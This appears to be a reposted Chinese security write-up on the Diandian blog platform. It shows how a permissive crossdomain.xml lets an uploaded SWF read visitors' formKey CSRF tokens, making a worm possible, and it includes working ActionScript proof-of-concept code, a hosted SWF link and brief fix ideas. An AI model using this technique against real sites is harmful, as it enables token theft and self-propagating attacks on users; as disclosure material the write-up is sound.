模版静态资源上传页面(http://www.diandian.com/upload/asset)和Flash跨域通信的配置文件中(http://www.diandain.com/crossdomain.xml)允许的域名相同,只需上传一个SWF,就可以读到formKey了。把这SWF嵌入到blog页面中,读到访客的formKey,调用externalInterface把值给输到JS里,又能worm了吧。 http://x.libdd.com/farm1/f15341/7cef03a1/diandian.swf var result_txt = new TextField(); result_txt.x = 0; result_txt.y = 0; result_txt.height = 22; result_txt.width = 200; addChild(result_txt); var targetURL:String="http://www.diandian.com/home"; var request:URLRequest=new URLRequest(targetURL); request.method=URLRequestMethod.GET; var loader:URLLoader=new URLLoader(); loader.addEventListener(Event.COMPLETE,completeHandler); function completeHandler(event:Event){ var formKey:String = loader.data; formKey = formKey.split("window.DDformKey = '")[1].split("'")[0] result_txt.text = formKey } loader.load(request) 效果就这样: 修复方案: 改配置文件?改存储静态文件的域名? 作者 p.z
查看更多关于点点网反射型XSS Ⅱ及formKey泄露 - 网站安全 - 自学的详细内容...